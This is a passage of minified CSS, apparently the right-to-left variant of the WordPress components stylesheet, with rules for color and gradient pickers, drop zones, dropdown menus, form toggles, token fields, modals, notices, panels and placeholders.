var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline-width:2px}.components-color-palette__custom-color-button:after{background-image:repeating-linear-gradient(45deg,#e0e0e0 25%,#0000 0,#0000 75%,#e0e0e0 0,#e0e0e0),repeating-linear-gradient(45deg,#e0e0e0 25%,#0000 0,#0000 75%,#e0e0e0 0,#e0e0e0);background-position:0 0,24px 24px;background-size:48px 48px;border-radius:3px 3px 0 0;content:"";inset:1px;position:absolute;z-index:-1}.components-color-palette__custom-color-text-wrapper{border-radius:0 0 4px 4px;box-shadow:inset 0 -1px 0 0 #0003,inset -1px 0 0 0 #0003,inset 1px 0 0 0 #0003;font-size:13px;padding:12px 16px;position:relative}.components-color-palette__custom-color-name{color:var(--wp-components-color-foreground,#1e1e1e);margin:0 1px}.components-color-palette__custom-color-value{color:#757575}.components-color-palette__custom-color-value--is-hex{text-transform:uppercase}.components-color-palette__custom-color-value:empty:after{content:"​";visibility:hidden}.components-custom-gradient-picker__gradient-bar{border-radius:2px;height:48px;position:relative;width:100%;z-index:1}.components-custom-gradient-picker__gradient-bar.has-gradient{background-image:repeating-linear-gradient(45deg,#e0e0e0 25%,#0000 0,#0000 75%,#e0e0e0 0,#e0e0e0),repeating-linear-gradient(45deg,#e0e0e0 25%,#0000 0,#0000 75%,#e0e0e0 0,#e0e0e0);background-position:0 0,12px 12px;background-size:24px 24px}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__gradient-bar-background{inset:0;position:absolute}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__markers-container{margin-left:auto;margin-right:auto;position:relative;width:calc(100% - 48px)}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-dropdown{display:flex;height:16px;position:absolute;top:16px;width:16px}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__insert-point-dropdown{background:#fff;border-radius:50%;color:#1e1e1e;height:inherit;min-width:16px!important;padding:2px;position:relative;width:inherit}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__insert-point-dropdown svg{height:100%;width:100%}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button{border-radius:50%;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) #fff,0 0 2px 0 #00000040;height:inherit;outline:2px solid #0000;padding:0;width:inherit}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button.is-active,.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button:focus{box-shadow:inset 0 0 0 calc(var(--wp-admin-border-width-focus)*2) #fff,0 0 2px 0 #00000040;outline:1.5px solid #0000}.components-custom-gradient-picker__remove-control-point-wrapper{padding-bottom:8px}.components-custom-gradient-picker__inserter{direction:ltr}.components-custom-gradient-picker__liner-gradient-indicator{display:inline-block;flex:0 auto;height:20px;width:20px}.components-custom-gradient-picker__ui-line{position:relative;z-index:0}body.is-dragging-components-draggable{cursor:move;cursor:grabbing!important}.components-draggable__invisible-drag-image{height:50px;position:fixed;right:-1000px;width:50px}.components-draggable__clone{background:#0000;padding:0;pointer-events:none;position:fixed;z-index:1000000000}.components-drop-zone{border-radius:2px;bottom:0;left:0;opacity:0;position:absolute;right:0;top:0;visibility:hidden;z-index:40}.components-drop-zone.is-active{opacity:1;visibility:visible}.components-drop-zone .components-drop-zone__content{align-items:center;background-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));bottom:0;color:#fff;display:flex;height:100%;justify-content:center;left:0;opacity:0;pointer-events:none;position:absolute;right:0;text-align:center;top:0;width:100%;z-index:50}.components-drop-zone .components-drop-zone__content-inner{opacity:0;transform:scale(.9)}.components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content{opacity:1}@media not (prefers-reduced-motion){.components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content{transition:opacity .2s ease-in-out}}.components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content-inner{opacity:1;transform:scale(1)}@media not (prefers-reduced-motion){.components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content-inner{transition:opacity .1s ease-in-out .1s,transform .1s ease-in-out .1s}}.components-drop-zone__content-icon,.components-drop-zone__content-text{display:block}.components-drop-zone__content-icon{line-height:0;margin:0 auto 8px;fill:currentColor;pointer-events:none}.components-drop-zone__content-text{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px}.components-dropdown{display:inline-block}.components-dropdown__content .components-popover__content{padding:8px}.components-dropdown__content .components-popover__content:has(.components-menu-group){padding:0}.components-dropdown__content .components-popover__content:has(.components-menu-group) .components-dropdown-menu__menu>.components-menu-item__button,.components-dropdown__content .components-popover__content:has(.components-menu-group)>.components-menu-item__button{margin:8px;width:auto}.components-dropdown__content [role=menuitem]{white-space:nowrap}.components-dropdown__content .components-menu-group{padding:8px}.components-dropdown__content .components-menu-group+.components-menu-group{border-top:1px solid #ccc;padding:8px}.components-dropdown__content.is-alternate .components-menu-group+.components-menu-group{border-color:#1e1e1e}.components-dropdown-menu__toggle{vertical-align:top}.components-dropdown-menu__menu{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:1.4;width:100%}.components-dropdown-menu__menu .components-dropdown-menu__menu-item,.components-dropdown-menu__menu .components-menu-item{cursor:pointer;outline:none;padding:6px;white-space:nowrap;width:100%}.components-dropdown-menu__menu .components-dropdown-menu__menu-item.has-separator,.components-dropdown-menu__menu .components-menu-item.has-separator{margin-top:6px;overflow:visible;position:relative}.components-dropdown-menu__menu .components-dropdown-menu__menu-item.has-separator:before,.components-dropdown-menu__menu .components-menu-item.has-separator:before{background-color:#ddd;box-sizing:initial;content:"";display:block;height:1px;left:0;position:absolute;right:0;top:-3px}.components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-active .dashicon,.components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-active svg,.components-dropdown-menu__menu .components-menu-item.is-active .dashicon,.components-dropdown-menu__menu .components-menu-item.is-active svg{background:#1e1e1e;border-radius:1px;box-shadow:0 0 0 1px #1e1e1e;color:#fff}.components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-icon-only,.components-dropdown-menu__menu .components-menu-item.is-icon-only{width:auto}.components-dropdown-menu__menu .components-menu-item__button,.components-dropdown-menu__menu .components-menu-item__button.components-button{height:auto;min-height:40px;padding-left:8px;padding-right:8px;text-align:right}.components-duotone-picker__color-indicator:before{background:#0000}.components-duotone-picker__color-indicator>.components-button,.components-duotone-picker__color-indicator>.components-button.is-pressed:hover:not(:disabled){background:linear-gradient(45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0);color:#0000}.components-duotone-picker__color-indicator>.components-button:hover:not(:disabled):not([aria-disabled=true]),.components-duotone-picker__color-indicator>.components-button:not([aria-disabled=true]):active{color:#0000}.components-color-list-picker,.components-color-list-picker__swatch-button{width:100%}.components-color-list-picker__color-picker{margin:8px 0}.components-color-list-picker__swatch-color{margin:2px}.components-external-link{text-decoration:none}.components-external-link__contents{text-decoration:underline}.components-external-link__icon{font-weight:400;margin-right:.5ch}.components-form-toggle{display:inline-block;height:16px;position:relative}.components-form-toggle .components-form-toggle__track{background-color:#fff;border:1px solid #949494;border-radius:8px;box-sizing:border-box;content:"";display:inline-block;height:16px;position:relative;vertical-align:top;width:32px}@media not (prefers-reduced-motion){.components-form-toggle .components-form-toggle__track{transition:background-color .2s ease,border-color .2s ease}}.components-form-toggle .components-form-toggle__track{overflow:hidden}.components-form-toggle .components-form-toggle__track:after{border-top:16px solid #0000;box-sizing:border-box;content:"";inset:0;position:absolute}@media not (prefers-reduced-motion){.components-form-toggle .components-form-toggle__track:after{transition:opacity .2s ease}}.components-form-toggle .components-form-toggle__track:after{opacity:0}.components-form-toggle .components-form-toggle__thumb{border-radius:50%;box-sizing:border-box;display:block;height:12px;position:absolute;right:2px;top:2px;width:12px}@media not (prefers-reduced-motion){.components-form-toggle .components-form-toggle__thumb{transition:transform .2s ease,background-color .2s ease-out}}.components-form-toggle .components-form-toggle__thumb{background-color:#1e1e1e;border:6px solid #0000;box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003}.components-form-toggle.is-checked .components-form-toggle__track{background-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-form-toggle.is-checked .components-form-toggle__track:after{opacity:1}.components-form-toggle .components-form-toggle__input:focus+.components-form-toggle__track{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff,0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000;outline-offset:2px}.components-form-toggle.is-checked .components-form-toggle__thumb{background-color:#fff;border-width:0;transform:translateX(-16px)}.components-disabled .components-form-toggle,.components-form-toggle.is-disabled{opacity:.3}.components-form-toggle input.components-form-toggle__input[type=checkbox]{border:none;height:100%;margin:0;opacity:0;padding:0;position:absolute;right:0;top:0;width:100%;z-index:1}.components-form-toggle input.components-form-toggle__input[type=checkbox]:checked{background:none}.components-form-toggle input.components-form-toggle__input[type=checkbox]:before{content:""}.components-form-toggle input.components-form-toggle__input[type=checkbox]:not(:disabled,[aria-disabled=true]){cursor:pointer}.components-form-token-field__input-container{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.components-form-token-field__input-container{transition:box-shadow .1s linear}}@media (min-width:600px){.components-form-token-field__input-container{font-size:13px;line-height:normal}}.components-form-token-field__input-container:focus{border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));box-shadow:0 0 0 .5px var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-form-token-field__input-container::-webkit-input-placeholder{color:#1e1e1e9e}.components-form-token-field__input-container::-moz-placeholder{color:#1e1e1e9e}.components-form-token-field__input-container:-ms-input-placeholder{color:#1e1e1e9e}.components-form-token-field__input-container{cursor:text;padding:0;width:100%}.components-form-token-field__input-container.is-disabled{background:#ddd;border-color:#ddd}.components-form-token-field__input-container.is-active{border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));box-shadow:0 0 0 .5px var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-form-token-field__input-container input[type=text].components-form-token-field__input{background:inherit;border:0;box-shadow:none;color:var(--wp-components-color-foreground,#1e1e1e);display:inline-block;flex:1;font-family:inherit;font-size:16px;margin-right:4px;max-width:100%;min-height:24px;min-width:50px;padding:0;width:100%}@media (min-width:600px){.components-form-token-field__input-container input[type=text].components-form-token-field__input{font-size:13px}}.components-form-token-field.is-active .components-form-token-field__input-container input[type=text].components-form-token-field__input,.components-form-token-field__input-container input[type=text].components-form-token-field__input:focus{box-shadow:none;outline:none}.components-form-token-field__input-container .components-form-token-field__token+input[type=text].components-form-token-field__input{width:auto}.components-form-token-field__token{color:#1e1e1e;display:flex;font-size:13px;max-width:100%}.components-form-token-field__token.is-success .components-form-token-field__remove-token,.components-form-token-field__token.is-success .components-form-token-field__token-text{background:#4ab866}.components-form-token-field__token.is-error .components-form-token-field__remove-token,.components-form-token-field__token.is-error .components-form-token-field__token-text{background:#cc1818}.components-form-token-field__token.is-validating .components-form-token-field__remove-token,.components-form-token-field__token.is-validating .components-form-token-field__token-text{color:#757575}.components-form-token-field__token.is-borderless{padding:0 0 0 24px;position:relative}.components-form-token-field__token.is-borderless .components-form-token-field__token-text{background:#0000}.components-form-token-field__token.is-borderless:not(.is-disabled) .components-form-token-field__token-text{color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-form-token-field__token.is-borderless .components-form-token-field__remove-token{background:#0000;color:#757575;left:0;position:absolute;top:1px}.components-form-token-field__token.is-borderless.is-success .components-form-token-field__token-text{color:#4ab866}.components-form-token-field__token.is-borderless.is-error .components-form-token-field__token-text{color:#cc1818;padding:0 6px 0 4px}.components-form-token-field__token.is-borderless.is-validating .components-form-token-field__token-text{color:#1e1e1e}.components-form-token-field__remove-token.components-button,.components-form-token-field__token-text{background:#ddd;display:inline-block;height:auto;min-width:unset}@media not (prefers-reduced-motion){.components-form-token-field__remove-token.components-button,.components-form-token-field__token-text{transition:all .2s cubic-bezier(.4,1,.4,1)}}.components-form-token-field__token-text{border-radius:0 1px 1px 0;line-height:24px;overflow:hidden;padding:0 8px 0 0;text-overflow:ellipsis;white-space:nowrap}.components-form-token-field__remove-token.components-button{border-radius:1px 0 0 1px;color:#1e1e1e;line-height:10px;overflow:initial}.components-form-token-field__remove-token.components-button:hover:not(:disabled){color:#1e1e1e}.components-form-token-field__suggestions-list{flex:1 0 100%;max-height:128px;min-width:100%;overflow-y:auto}@media not (prefers-reduced-motion){.components-form-token-field__suggestions-list{transition:all .15s ease-in-out}}.components-form-token-field__suggestions-list{box-shadow:inset 0 1px 0 0 #949494;list-style:none;margin:0;padding:0}.components-form-token-field__suggestion{box-sizing:border-box;color:var(--wp-components-color-foreground,#1e1e1e);display:block;font-size:13px;margin:0;min-height:32px;padding:8px 12px}.components-form-token-field__suggestion.is-selected{background:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));color:var(--wp-components-color-foreground-inverted,#fff)}.components-form-token-field__suggestion[aria-disabled=true]{color:#949494;pointer-events:none}.components-form-token-field__suggestion[aria-disabled=true].is-selected{background:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 4%,#0000)}.components-form-token-field__suggestion:not(.is-empty){cursor:pointer}@media (min-width:600px){.components-guide{width:600px}}.components-guide .components-modal__content{margin-top:0;padding:0}.components-guide .components-modal__content:before{content:none}.components-guide .components-modal__header{border-bottom:none;height:64px;padding:0;position:sticky}.components-guide .components-modal__header .components-button{align-self:flex-start;margin:8px 0 0 8px;position:static}.components-guide .components-modal__header .components-button:hover svg{fill:#fff}.components-guide .components-guide__container{display:flex;flex-direction:column;justify-content:space-between;margin-top:-64px;min-height:100%}.components-guide .components-guide__page{display:flex;flex-direction:column;justify-content:center;position:relative}@media (min-width:600px){.components-guide .components-guide__page{min-height:300px}}.components-guide .components-guide__footer{align-content:center;display:flex;height:36px;justify-content:center;margin:0 0 24px;padding:0 32px;position:relative;width:100%}.components-guide .components-guide__page-control{margin:0;text-align:center}.components-guide .components-guide__page-control li{display:inline-block;margin:0}.components-guide .components-guide__page-control .components-button{color:#e0e0e0;margin:-6px 0}.components-guide .components-guide__page-control li[aria-current=step] .components-button{color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-modal__frame.components-guide{border:none;max-height:575px;min-width:312px}@media (max-width:600px){.components-modal__frame.components-guide{margin:auto;max-width:calc(100vw - 32px)}}.components-button.components-guide__back-button,.components-button.components-guide__finish-button,.components-button.components-guide__forward-button{position:absolute}.components-button.components-guide__back-button{right:32px}.components-button.components-guide__finish-button,.components-button.components-guide__forward-button{left:32px}[role=region]{position:relative}.is-focusing-regions [role=region]:focus:after,[role=region].interface-interface-skeleton__content:focus-visible:after{bottom:0;content:"";left:0;pointer-events:none;position:absolute;right:0;top:0;z-index:1000000}.is-focusing-regions .editor-post-publish-panel,.is-focusing-regions .interface-interface-skeleton__actions .editor-layout__toggle-entities-saved-states-panel,.is-focusing-regions .interface-interface-skeleton__actions .editor-layout__toggle-publish-panel,.is-focusing-regions .interface-interface-skeleton__sidebar .editor-layout__toggle-sidebar-panel,.is-focusing-regions [role=region]:focus:after,.is-focusing-regions.is-distraction-free .interface-interface-skeleton__header .edit-post-header,[role=region].interface-interface-skeleton__content:focus-visible:after{outline-color:var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-2/var(--wp-block-editor-iframe-zoom-out-scale, 1));outline-style:solid;outline-width:calc(var(--wp-admin-border-width-focus)*2/var(--wp-block-editor-iframe-zoom-out-scale, 1))}.components-menu-group+.components-menu-group{border-top:1px solid #1e1e1e;padding-top:8px}.components-menu-group+.components-menu-group.has-hidden-separator{border-top:none;margin-top:0;padding-top:0}.components-menu-group:has(>div:empty){display:none}.components-menu-group__label{color:#757575;font-size:11px;font-weight:500;margin-bottom:12px;margin-top:4px;padding:0 8px;text-transform:uppercase;white-space:nowrap}.components-menu-item__button,.components-menu-item__button.components-button{width:100%}.components-menu-item__button.components-button[role=menuitemcheckbox] .components-menu-item__item:only-child,.components-menu-item__button.components-button[role=menuitemradio] .components-menu-item__item:only-child,.components-menu-item__button[role=menuitemcheckbox] .components-menu-item__item:only-child,.components-menu-item__button[role=menuitemradio] .components-menu-item__item:only-child{box-sizing:initial;padding-left:48px}.components-menu-item__button .components-menu-items__item-icon,.components-menu-item__button.components-button .components-menu-items__item-icon{display:inline-block;flex:0 0 auto}.components-menu-item__button .components-menu-items__item-icon.has-icon-right,.components-menu-item__button.components-button .components-menu-items__item-icon.has-icon-right{margin-left:-2px;margin-right:24px}.components-menu-item__button .components-menu-item__shortcut+.components-menu-items__item-icon.has-icon-right,.components-menu-item__button.components-button .components-menu-item__shortcut+.components-menu-items__item-icon.has-icon-right{margin-right:8px}.components-menu-item__button .block-editor-block-icon,.components-menu-item__button.components-button .block-editor-block-icon{margin-left:8px;margin-right:-2px}.components-menu-item__button.components-button.is-primary,.components-menu-item__button.is-primary{justify-content:center}.components-menu-item__button.components-button.is-primary .components-menu-item__item,.components-menu-item__button.is-primary .components-menu-item__item{margin-left:0}.components-menu-item__button.components-button:disabled.is-tertiary,.components-menu-item__button.components-button[aria-disabled=true].is-tertiary,.components-menu-item__button:disabled.is-tertiary,.components-menu-item__button[aria-disabled=true].is-tertiary{background:none;color:var(--wp-components-color-accent-darker-10,var(--wp-admin-theme-color-darker-10,#2145e6));opacity:.3}.components-menu-item__info-wrapper{display:flex;flex-direction:column;margin-left:auto}.components-menu-item__info{color:#757575;font-size:12px;margin-top:4px;white-space:normal}.components-menu-item__item{align-items:center;display:inline-flex;margin-left:auto;min-width:160px;white-space:nowrap}.components-menu-item__shortcut{align-self:center;color:currentColor;display:none;margin-left:0;margin-right:auto;padding-right:24px}@media (min-width:480px){.components-menu-item__shortcut{display:inline}}.components-menu-items-choice,.components-menu-items-choice.components-button{height:auto;min-height:40px}.components-menu-items-choice svg,.components-menu-items-choice.components-button svg{margin-left:12px}.components-menu-items-choice.components-button.has-icon,.components-menu-items-choice.has-icon{padding-right:12px}.components-modal__screen-overlay{background-color:#00000059;bottom:0;display:flex;left:0;position:fixed;right:0;top:0;z-index:100000}@keyframes __wp-base-styles-fade-in{0%{opacity:0}to{opacity:1}}@media not (prefers-reduced-motion){.components-modal__screen-overlay{animation:__wp-base-styles-fade-in .08s linear 0s;animation-fill-mode:forwards}}@keyframes __wp-base-styles-fade-out{0%{opacity:1}to{opacity:0}}@media not (prefers-reduced-motion){.components-modal__screen-overlay.is-animating-out{animation:__wp-base-styles-fade-out .08s linear 80ms;animation-fill-mode:forwards}}.components-modal__frame{box-sizing:border-box}.components-modal__frame *,.components-modal__frame :after,.components-modal__frame :before{box-sizing:inherit}.components-modal__frame{animation-fill-mode:forwards;animation-name:components-modal__appear-animation;animation-timing-function:cubic-bezier(.29,0,0,1);background:#fff;border-radius:8px 8px 0 0;box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005;color:#1e1e1e;display:flex;margin:40px 0 0;overflow:hidden;width:100%}.components-modal__frame h1,.components-modal__frame h2,.components-modal__frame h3{color:#1e1e1e}@media not (prefers-reduced-motion){.components-modal__frame{animation-duration:var(--modal-frame-animation-duration)}}.components-modal__screen-overlay.is-animating-out .components-modal__frame{animation-name:components-modal__disappear-animation;animation-timing-function:cubic-bezier(1,0,.2,1)}@media (min-width:600px){.components-modal__frame{border-radius:8px;margin:auto;max-height:calc(100% - 128px);max-width:calc(100% - 32px);min-width:350px;width:auto}}@media (min-width:600px) and (min-width:600px){.components-modal__frame.is-full-screen{height:calc(100% - 32px);max-height:none;width:calc(100% - 32px)}}@media (min-width:600px) and (min-width:782px){.components-modal__frame.is-full-screen{height:calc(100% - 80px);max-width:none;width:calc(100% - 80px)}}@media (min-width:600px){.components-modal__frame.has-size-large,.components-modal__frame.has-size-medium,.components-modal__frame.has-size-small{width:100%}.components-modal__frame.has-size-small{max-width:384px}.components-modal__frame.has-size-medium{max-width:512px}.components-modal__frame.has-size-large{max-width:840px}}@media (min-width:960px){.components-modal__frame{max-height:70%}}@keyframes components-modal__appear-animation{0%{opacity:0;transform:scale(.9)}to{opacity:1;transform:scale(1)}}@keyframes components-modal__disappear-animation{0%{opacity:1;transform:scale(1)}to{opacity:0;transform:scale(.9)}}.components-modal__header{align-items:center;border-bottom:1px solid #0000;box-sizing:border-box;display:flex;flex-direction:row;height:72px;justify-content:space-between;padding:24px 32px 8px;position:absolute;right:0;top:0;width:100%;z-index:10}.components-modal__header .components-modal__header-heading{font-size:1.2rem;font-weight:600}.components-modal__header h1{line-height:1;margin:0}.components-modal__content.has-scrolled-content:not(.hide-header) .components-modal__header{border-bottom-color:#ddd}.components-modal__header+p{margin-top:0}.components-modal__header-heading-container{align-items:center;display:flex;flex-direction:row;flex-grow:1;justify-content:flex-start}.components-modal__header-icon-container{display:inline-block}.components-modal__header-icon-container svg{max-height:36px;max-width:36px;padding:8px}.components-modal__content{flex:1;margin-top:72px;overflow:auto;padding:4px 32px 32px}.components-modal__content.hide-header{margin-top:0;padding-top:32px}.components-modal__content.is-scrollable:focus-visible{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000;outline-offset:-2px}.components-notice{align-items:center;background-color:#fff;border-right:4px solid var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));color:#1e1e1e;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;padding:8px 12px}.components-notice.is-dismissible{position:relative}.components-notice.is-success{background-color:#eff9f1;border-right-color:#4ab866}.components-notice.is-warning{background-color:#fef8ee;border-right-color:#f0b849}.components-notice.is-error{background-color:#f4a2a2;border-right-color:#cc1818}.components-notice__content{flex-grow:1;margin:4px 0 4px 25px}.components-notice__actions{display:flex;flex-wrap:wrap}.components-notice__action.components-button,.components-notice__action.components-button.is-link{margin-right:12px}.components-notice__action.components-button.is-secondary{vertical-align:initial}.components-notice__action.components-button{margin-left:8px}.components-notice__dismiss{align-self:flex-start;color:#757575;flex-shrink:0}.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):focus,.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):active,.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):hover{background-color:initial;color:#1e1e1e}.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):hover{box-shadow:none}.components-notice-list{box-sizing:border-box;max-width:100vw}.components-notice-list .components-notice__content{line-height:2;margin-bottom:12px;margin-top:12px}.components-notice-list .components-notice__action.components-button{display:block;margin-right:0;margin-top:8px}.components-panel{background:#fff;border:1px solid #e0e0e0}.components-panel>.components-panel__body:first-child,.components-panel>.components-panel__header:first-child{margin-top:-1px}.components-panel>.components-panel__body:last-child,.components-panel>.components-panel__header:last-child{border-bottom-width:0}.components-panel+.components-panel{margin-top:-1px}.components-panel__body{border-bottom:1px solid #e0e0e0;border-top:1px solid #e0e0e0}.components-panel__body h3{margin:0 0 .5em}.components-panel__body.is-opened{padding:16px}.components-panel__header{align-items:center;border-bottom:1px solid #ddd;box-sizing:initial;display:flex;flex-shrink:0;height:47px;justify-content:space-between;padding:0 16px}.components-panel__header h2{color:inherit;font-size:inherit;margin:0}.components-panel__body+.components-panel__body,.components-panel__body+.components-panel__header,.components-panel__header+.components-panel__body,.components-panel__header+.components-panel__header{margin-top:-1px}.components-panel__body>.components-panel__body-title{display:block;font-size:inherit;margin-bottom:0;margin-top:0;padding:0}@media not (prefers-reduced-motion){.components-panel__body>.components-panel__body-title{transition:background .1s ease-in-out}}.components-panel__body.is-opened>.components-panel__body-title{margin:-16px -16px 5px}.components-panel__body>.components-panel__body-title:hover{background:#f0f0f0;border:none}.components-panel__body-toggle.components-button{border:none;box-shadow:none;color:#1e1e1e;font-weight:500;outline:none;padding:16px 16px 16px 48px;position:relative;text-align:right;width:100%}@media not (prefers-reduced-motion){.components-panel__body-toggle.components-button{transition:background .1s ease-in-out}}.components-panel__body-toggle.components-button{height:auto}.components-panel__body-toggle.components-button:focus{border-radius:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-panel__body-toggle.components-button .components-panel__arrow{color:#1e1e1e;left:16px;position:absolute;top:50%;transform:translateY(-50%);fill:currentColor}@media not (prefers-reduced-motion){.components-panel__body-toggle.components-button .components-panel__arrow{transition:color .1s ease-in-out}}body.rtl .components-panel__body-toggle.components-button .dashicons-arrow-right{-ms-filter:fliph;filter:FlipH;margin-top:-10px;transform:scaleX(-1)}.components-panel__icon{color:#757575;margin:-2px 6px -2px 0}.components-panel__body-toggle-icon{margin-left:-5px}.components-panel__color-title{float:right;height:19px}.components-panel__row{align-items:center;display:flex;justify-content:space-between;margin-top:8px;min-height:36px}.components-panel__row select{min-width:0}.components-panel__row label{flex-shrink:0;margin-left:12px;max-width:75%}.components-panel__row:empty,.components-panel__row:first-of-type{margin-top:0}.components-panel .circle-picker{padding-bottom:20px}.components-placeholder.components-placeholder{align-items:flex-start;box-sizing:border-box;color:#1e1e1e;display:flex;flex-direction:column;font-size:13px;gap:16px;margin:0;padding:24px;position:relative;text-align:right;width:100%;-moz-font-smoothing:subpixel-antialiased;-webkit-font-smoothing:subpixel-antialiased;background-color:#fff;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;outline:1px solid #0000}.components-placeholder__error,.components-placeholder__fieldset,.components-placeholder__instructions,.components-placeholder__label{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;letter-spacing:normal;line-height:normal;text-transform:none}.components-placeholder__label{align-items:center;display:flex;font-weight:600}.components-placeholder__label .block-editor-block-icon,.components-placeholder__label .dashicon,.components-placeholder__label>svg{margin-left:4px;fill:currentColor}@media (forced-colors:active){.components-placeholder__label .block-editor-block-icon,.components-placeholder__label .dashicon,.components-placeholder__label>svg{fill:CanvasText}}.components-placeholder__label:empty{display:none}.components-placeholder__fieldset,.components-placeholder__fieldset form{display:flex;flex-direction:row;flex-wrap:wrap;gap:16px;justify-content:flex-start;width:100%}.components-placeholder__fieldset form p,.components-placeholder__fieldset p{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px}.components-placeholder__fieldset.is-column-layout,.components-placeholder__fieldset.is-column-layout form{flex-direction:column}.components-placeholder__input[type=url]{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.components-placeholder__input[type=url]{transition:box-shadow .1s linear}}@media (min-width:600px){.components-placeholder__input[type=url]{font-size:13px;line-height:normal}}.components-placeholder__input[type=url]:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color);outline:2px solid #0000}.components-placeholder__input[type=url]::-webkit-input-placeholder{color:#1e1e1e9e}.components-placeholder__input[type=url]::-moz-placeholder{color:#1e1e1e9e}.components-placeholder__input[type=url]:-ms-input-placeholder{color:#1e1e1e9e}.components-placeholder__input[type=url]{flex:1 1 auto}.components-placeholder__error{gap:8px;width:100%}.components-placeholder__fieldset .components-button:not(.is-link)~.components-button.is-link{margin-left:10px;margin-right:10px}.components-placeholder__fieldset .components-button:not(.is-link)~.components-button.is-link:last-child{margin-left:0}.components-placeholder.is-medium .components-placeholder__instructions,.components-placeholder.is-small .components-placeholder__instructions{display:none}.components-placeholder.is-medium .components-placeholder__fieldset,.components-placeholder.is-medium .components-placeholder__fieldset form,.components-placeholder.is-small .components-placeholder__fieldset,.components-placeholder.is-small .components-placeholder__fieldset form{flex-direction:column}.components-placeholder.is-medium .components-button,.components-placeholder.is-medium .components-placeholder__fieldset>*,.components-placeholder.is-small .components-button,.components-placeholder.is-small .components-placeholder__fieldset>*{justify-content:center;width:100%}.components-placeholder.is-small{padding:16px}.components-placeholder.has-illustration{backdrop-filter:blur(100px);backface-visibility:hidden;background-color:initial;border-radius:0;box-shadow:none;color:inherit;display:flex}.is-dark-theme .components-placeholder.has-illustration{background-color:#0000001a}.components-placeholder.has-illustration .components-placeholder__fieldset{margin-left:0;margin-right:0}.components-placeholder.has-illustration .components-button,.components-placeholder.has-illustration .components-placeholder__instructions,.components-placeholder.has-illustration .components-placeholder__label{opacity:0;pointer-events:none}@media not (prefers-reduced-motion){.components-placeholder.has-illustration .components-button,.components-placeholder.has-illustration .components-placeholder__instructions,.components-placeholder.has-illustration .components-placeholder__label{transition:opacity .1s linear}}.is-selected>.components-placeholder.has-illustration .components-button,.is-selected>.components-placeholder.has-illustration 